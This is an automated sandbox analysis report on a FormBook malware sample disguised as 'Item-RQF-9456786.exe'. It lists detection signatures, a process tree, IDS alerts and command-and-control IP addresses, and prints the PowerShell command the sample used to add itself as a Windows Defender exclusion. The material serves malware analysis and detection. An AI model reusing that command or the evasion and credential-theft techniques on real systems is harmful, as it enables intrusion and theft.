Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Item-RQF-9456786.exe

Overview

General Information

Sample name:Item-RQF-9456786.exe
Analysis ID:1555193
MD5:2980d8a9894fb28427f03922f74d1c76
SHA1:615db143a4eaca8788e1110be17e3c2144a594fc
SHA256:c38ac70a0c3bcc6f2f94c6ba1f74365666a20bd8fa7ed97e6c343dcf998f0535
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Item-RQF-9456786.exe (PID: 1628 cmdline: "C:\Users\user\Desktop\Item-RQF-9456786.exe" MD5: 2980D8A9894FB28427F03922F74D1C76)
    • powershell.exe (PID: 2292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3060 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • Item-RQF-9456786.exe (PID: 5988 cmdline: "C:\Users\user\Desktop\Item-RQF-9456786.exe" MD5: 2980D8A9894FB28427F03922F74D1C76)
      • LiiDBuNLRIYu.exe (PID: 1568 cmdline: "C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • fontview.exe (PID: 2584 cmdline: "C:\Windows\SysWOW64\fontview.exe" MD5: 8324ECE6961ADBE6120CCE9E0BC05F76)
          • LiiDBuNLRIYu.exe (PID: 3160 cmdline: "C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1408 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: Item-RQF-9456786.exe PID: 1628JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Item-RQF-9456786.exe", ParentImage: C:\Users\user\Desktop\Item-RQF-9456786.exe, ParentProcessId: 1628, ParentProcessName: Item-RQF-9456786.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe", ProcessId: 2292, ProcessName: powershell.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Item-RQF-9456786.exe", ParentImage: C:\Users\user\Desktop\Item-RQF-9456786.exe, ParentProcessId: 1628, ParentProcessName: Item-RQF-9456786.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe", ProcessId: 2292, ProcessName: powershell.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Item-RQF-9456786.exe", ParentImage: C:\Users\user\Desktop\Item-RQF-9456786.exe, ParentProcessId: 1628, ParentProcessName: Item-RQF-9456786.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe", ProcessId: 2292, ProcessName: powershell.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-13T15:33:26.506314+010020229301A Network Trojan was detected4.175.87.197443192.168.2.549727TCP
    2024-11-13T15:34:05.939404+010020229301A Network Trojan was detected4.175.87.197443192.168.2.549940TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-13T15:34:06.956752+010020507451Malware Command and Control Activity Detected192.168.2.549950185.134.245.11380TCP
    2024-11-13T15:34:30.995967+010020507451Malware Command and Control Activity Detected192.168.2.549986208.115.225.22080TCP
    2024-11-13T15:34:45.236728+010020507451Malware Command and Control Activity Detected192.168.2.549990194.58.112.17480TCP
    2024-11-13T15:35:00.107606+010020507451Malware Command and Control Activity Detected192.168.2.54999420.2.36.11280TCP
    2024-11-13T15:35:14.617206+010020507451Malware Command and Control Activity Detected192.168.2.549998203.161.46.20580TCP
    2024-11-13T15:35:28.543456+010020507451Malware Command and Control Activity Detected192.168.2.55000268.66.226.9280TCP
    2024-11-13T15:35:42.341995+010020507451Malware Command and Control Activity Detected192.168.2.550006109.70.26.3780TCP
    2024-11-13T15:35:58.921418+010020507451Malware Command and Control Activity Detected192.168.2.55001020.2.249.780TCP
    2024-11-13T15:36:12.733186+010020507451Malware Command and Control Activity Detected192.168.2.550014172.67.197.5780TCP
    2024-11-13T15:36:26.700645+010020507451Malware Command and Control Activity Detected192.168.2.55001850.18.131.22080TCP
    2024-11-13T15:36:49.331594+010020507451Malware Command and Control Activity Detected192.168.2.550022103.224.182.24280TCP
    2024-11-13T15:37:02.851534+010020507451Malware Command and Control Activity Detected192.168.2.55002676.223.74.7480TCP
    2024-11-13T15:37:17.605683+010020507451Malware Command and Control Activity Detected192.168.2.550030163.44.185.18380TCP
    2024-11-13T15:37:31.486188+010020507451Malware Command and Control Activity Detected192.168.2.550034188.114.96.380TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-13T15:34:06.956752+010028554651A Network Trojan was detected192.168.2.549950185.134.245.11380TCP
    2024-11-13T15:34:30.995967+010028554651A Network Trojan was detected192.168.2.549986208.115.225.22080TCP
    2024-11-13T15:34:45.236728+010028554651A Network Trojan was detected192.168.2.549990194.58.112.17480TCP
    2024-11-13T15:35:00.107606+010028554651A Network Trojan was detected192.168.2.54999420.2.36.11280TCP
    2024-11-13T15:35:14.617206+010028554651A Network Trojan was detected192.168.2.549998203.161.46.20580TCP
    2024-11-13T15:35:28.543456+010028554651A Network Trojan was detected192.168.2.55000268.66.226.9280TCP
    2024-11-13T15:35:42.341995+010028554651A Network Trojan was detected192.168.2.550006109.70.26.3780TCP
    2024-11-13T15:35:58.921418+010028554651A Network Trojan was detected192.168.2.55001020.2.249.780TCP
    2024-11-13T15:36:12.733186+010028554651A Network Trojan was detected192.168.2.550014172.67.197.5780TCP
    2024-11-13T15:36:26.700645+010028554651A Network Trojan was detected192.168.2.55001850.18.131.22080TCP
    2024-11-13T15:36:49.331594+010028554651A Network Trojan was detected192.168.2.550022103.224.182.24280TCP
    2024-11-13T15:37:02.851534+010028554651A Network Trojan was detected192.168.2.55002676.223.74.7480TCP
    2024-11-13T15:37:17.605683+010028554651A Network Trojan was detected192.168.2.550030163.44.185.18380TCP
    2024-11-13T15:37:31.486188+010028554651A Network Trojan was detected192.168.2.550034188.114.96.380TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-13T15:34:23.994480+010028554641A Network Trojan was detected192.168.2.549983208.115.225.22080TCP
    2024-11-13T15:34:25.924547+010028554641A Network Trojan was detected192.168.2.549984208.115.225.22080TCP
    2024-11-13T15:34:28.459454+010028554641A Network Trojan was detected192.168.2.549985208.115.225.22080TCP
    2024-11-13T15:34:37.185749+010028554641A Network Trojan was detected192.168.2.549987194.58.112.17480TCP
    2024-11-13T15:34:39.695401+010028554641A Network Trojan was detected192.168.2.549988194.58.112.17480TCP
    2024-11-13T15:34:42.646152+010028554641A Network Trojan was detected192.168.2.549989194.58.112.17480TCP
    2024-11-13T15:34:52.388822+010028554641A Network Trojan was detected192.168.2.54999120.2.36.11280TCP
    2024-11-13T15:34:54.935711+010028554641A Network Trojan was detected192.168.2.54999220.2.36.11280TCP
    2024-11-13T15:34:57.545146+010028554641A Network Trojan was detected192.168.2.54999320.2.36.11280TCP
    2024-11-13T15:35:05.997934+010028554641A Network Trojan was detected192.168.2.549995203.161.46.20580TCP
    2024-11-13T15:35:08.532649+010028554641A Network Trojan was detected192.168.2.549996203.161.46.20580TCP
    2024-11-13T15:35:11.091578+010028554641A Network Trojan was detected192.168.2.549997203.161.46.20580TCP
    2024-11-13T15:35:20.895373+010028554641A Network Trojan was detected192.168.2.54999968.66.226.9280TCP
    2024-11-13T15:35:23.479307+010028554641A Network Trojan was detected192.168.2.55000068.66.226.9280TCP
    2024-11-13T15:35:26.001141+010028554641A Network Trojan was detected192.168.2.55000168.66.226.9280TCP
    2024-11-13T15:35:34.686169+010028554641A Network Trojan was detected192.168.2.550003109.70.26.3780TCP
    2024-11-13T15:35:37.795182+010028554641A Network Trojan was detected192.168.2.550004109.70.26.3780TCP
    2024-11-13T15:35:39.748234+010028554641A Network Trojan was detected192.168.2.550005109.70.26.3780TCP
    2024-11-13T15:35:51.201369+010028554641A Network Trojan was detected192.168.2.55000720.2.249.780TCP
    2024-11-13T15:35:53.763868+010028554641A Network Trojan was detected192.168.2.55000820.2.249.780TCP
    2024-11-13T15:35:56.310755+010028554641A Network Trojan was detected192.168.2.55000920.2.249.780TCP
    2024-11-13T15:36:05.114998+010028554641A Network Trojan was detected192.168.2.550011172.67.197.5780TCP
    2024-11-13T15:36:07.717686+010028554641A Network Trojan was detected192.168.2.550012172.67.197.5780TCP
    2024-11-13T15:36:10.182261+010028554641A Network Trojan was detected192.168.2.550013172.67.197.5780TCP
    2024-11-13T15:36:18.896260+010028554641A Network Trojan was detected192.168.2.55001550.18.131.22080TCP
    2024-11-13T15:36:21.198476+010028554641A Network Trojan was detected192.168.2.55001650.18.131.22080TCP
    2024-11-13T15:36:23.779119+010028554641A Network Trojan was detected192.168.2.55001750.18.131.22080TCP
    2024-11-13T15:36:40.910512+010028554641A Network Trojan was detected192.168.2.550019103.224.182.24280TCP
    2024-11-13T15:36:43.419423+010028554641A Network Trojan was detected192.168.2.550020103.224.182.24280TCP
    2024-11-13T15:36:46.827586+010028554641A Network Trojan was detected192.168.2.550021103.224.182.24280TCP
    2024-11-13T15:36:55.120070+010028554641A Network Trojan was detected192.168.2.55002376.223.74.7480TCP
    2024-11-13T15:36:57.662562+010028554641A Network Trojan was detected192.168.2.55002476.223.74.7480TCP
    2024-11-13T15:37:00.260720+010028554641A Network Trojan was detected192.168.2.55002576.223.74.7480TCP
    2024-11-13T15:37:09.841662+010028554641A Network Trojan was detected192.168.2.550027163.44.185.18380TCP
    2024-11-13T15:37:12.389384+010028554641A Network Trojan was detected192.168.2.550028163.44.185.18380TCP
    2024-11-13T15:37:14.922552+010028554641A Network Trojan was detected192.168.2.550029163.44.185.18380TCP
    2024-11-13T15:37:24.060641+010028554641A Network Trojan was detected192.168.2.550031188.114.96.380TCP
    2024-11-13T15:37:26.215611+010028554641A Network Trojan was detected192.168.2.550032188.114.96.380TCP
    2024-11-13T15:37:28.803116+010028554641A Network Trojan was detected192.168.2.550033188.114.96.380TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Item-RQF-9456786.exeReversingLabs: Detection: 39%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: Item-RQF-9456786.exeJoe Sandbox ML: detected
    Source: Item-RQF-9456786.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Item-RQF-9456786.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: fontview.pdbGCTL source: Item-RQF-9456786.exe, 00000005.00000002.2562527494.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000002.4741009013.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: fontview.pdb source: Item-RQF-9456786.exe, 00000005.00000002.2562527494.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000002.4741009013.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: xtjX.pdbSHA256}Mz source: Item-RQF-9456786.exe
    Source: Binary string: wntdll.pdbUGP source: Item-RQF-9456786.exe, 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2560730066.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2568690850.0000000004DF2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: Item-RQF-9456786.exe, Item-RQF-9456786.exe, 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, fontview.exe, 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2560730066.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2568690850.0000000004DF2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: xtjX.pdb source: Item-RQF-9456786.exe
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0301C700 FindFirstFileW,FindNextFileW,FindClose,10_2_0301C700
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 4x nop then xor eax, eax10_2_03009E80
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 4x nop then pop edi10_2_0300E2F4
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 4x nop then mov ebx, 00000004h10_2_04EB04F8
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 4x nop then pop edi11_2_04CDF65A
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 4x nop then pop edi11_2_04CDE944
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 4x nop then pop edi11_2_04CE096C
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 4x nop then xor eax, eax11_2_04CE4179
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 4x nop then mov esp, ebp11_2_04CDE2A1

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49950 -> 185.134.245.113:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49950 -> 185.134.245.113:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 208.115.225.220:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 208.115.225.220:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49986 -> 208.115.225.220:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49986 -> 208.115.225.220:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 208.115.225.220:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 68.66.226.92:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49990 -> 194.58.112.174:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49990 -> 194.58.112.174:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 109.70.26.37:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 172.67.197.57:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 109.70.26.37:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 172.67.197.57:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50026 -> 76.223.74.74:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50026 -> 76.223.74.74:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 68.66.226.92:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 76.223.74.74:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 20.2.36.112:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 103.224.182.242:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 194.58.112.174:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 20.2.249.7:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50029 -> 163.44.185.183:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 20.2.249.7:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49994 -> 20.2.36.112:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49994 -> 20.2.36.112:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50010 -> 20.2.249.7:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 20.2.249.7:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 194.58.112.174:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 103.224.182.242:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50018 -> 50.18.131.220:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50018 -> 50.18.131.220:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50002 -> 68.66.226.92:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50002 -> 68.66.226.92:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 194.58.112.174:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 68.66.226.92:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 109.70.26.37:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 50.18.131.220:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50006 -> 109.70.26.37:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 109.70.26.37:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 20.2.36.112:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50022 -> 103.224.182.242:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50022 -> 103.224.182.242:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 20.2.36.112:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 172.67.197.57:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 76.223.74.74:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50014 -> 172.67.197.57:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50014 -> 172.67.197.57:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 50.18.131.220:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 103.224.182.242:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 76.223.74.74:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49998 -> 203.161.46.205:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 203.161.46.205:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 203.161.46.205:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 203.161.46.205:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 203.161.46.205:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 50.18.131.220:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50030 -> 163.44.185.183:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50030 -> 163.44.185.183:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 20.2.249.7:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50027 -> 163.44.185.183:80
    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50034 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50034 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50032 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50031 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50033 -> 188.114.96.3:80
    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 163.44.185.183:80
    Source: DNS query: www.ecojomos.xyz
    Source: Joe Sandbox ViewIP Address: 109.70.26.37 109.70.26.37
    Source: Joe Sandbox ViewIP Address: 20.2.249.7 20.2.249.7
